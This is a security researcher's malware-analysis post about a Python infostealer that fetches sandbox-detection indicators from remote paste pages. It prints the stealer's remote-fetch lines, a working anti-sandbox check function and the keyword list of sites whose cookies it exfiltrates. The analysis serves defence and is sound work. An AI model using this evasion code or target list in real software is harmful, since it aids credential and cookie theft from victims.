Python InfoStealer With Dynamic Sandbox Detection

    Published: 2024-02-20
    Last Updated: 2024-02-20 07:07:02 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Infostealers written in Python are not new. They also onboard a lot of sandbox detection mechanisms to prevent being executed (and probably detected) by automatic analysis. Last week, I found one that uses the same approach but in a different way. Usually, the scripts have a list of "bad stuff" to check like MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well-hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It's also a way to disclose less interesting information in the script.

    The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1]

    The script will fetch indicators from many files hosted on rentry.co[2]:

    remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py 
         processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
         mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
         vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
         vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
         hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
         gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
         ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
         guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
         bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
         baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
         serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text
    

    All files were published on January 27 2024 around 23:19 UTC. The website gives also the number of views. Currently, there are only two (certainly my visits) so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.

    Here is an example of usage:

    def checkgpu(self):
        c = wmi.WMI()
        for gpu in c.Win32_DisplayConfiguration():
            GPUm = gpu.Description.strip()
        gpulist = requests.get("https://rentry.co/povewdm6/raw").text
        if GPUm in gpulist:
            sys.exit()

    The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):

    keyword = [
        'mail', 
        '[coinbase](https://coinbase.com)', 
        '[sellix](https://sellix.io)',
        '[gmail](https://gmail.com)',
        '[steam](https://steam.com)',
        '[discord](https://discord.com)',
        '[riotgames](https://riotgames.com)',
        '[youtube](https://youtube.com)',
        '[instagram](https://instagram.com)',
        '[tiktok](https://tiktok.com)',
        '[twitter](https://twitter.com)',
        '[facebook](https://facebook.com)',
        'card',
        '[epicgames](https://epicgames.com)',
        '[spotify](https://spotify.com)',
        '[yahoo](https://yahoo.com)',
        '[roblox](https://roblox.com)',
        '[twitch](https://twitch.com)',
        '[minecraft](https://minecraft.net)',
        'bank',
        '[paypal](https://paypal.com)',
        '[origin](https://origin.com)',
        '[amazon](https://amazon.com)',
        '[ebay](https://ebay.com)',
        '[aliexpress](https://aliexpress.com)',
        '[playstation](https://playstation.com)',
        '[hbo](https://hbo.com)',
        '[xbox](https://xbox.com)',
        'buy',
        'sell',
        '[binance](https://binance.com)',
        '[hotmail](https://hotmail.com)',
        '[outlook](https://outlook.com)',
        '[crunchyroll](https://crunchyroll.com)',
        '[telegram](https://telegram.com)',
        '[pornhub](https://pornhub.com)',
        '[disney](https://disney.com)',
        '[expressvpn](https://expressvpn.com)',
        'crypto',
        '[uber](https://uber.com)', 
        '[netflix](https://netflix.com)'
    ]

    You can see that classic sites are targeted but generic keywords are also present like "crypto", "bank" or "card". Cookies belonging to URLs containing these keywords will also be exfiltrated.

    [1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
    [2] https://rentry.co

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    0 comment(s)
    ISC Stormcast For Tuesday, February 20th, 2024 https://isc.sans.edu/podcastdetail/8860

      Comments


      Diary Archives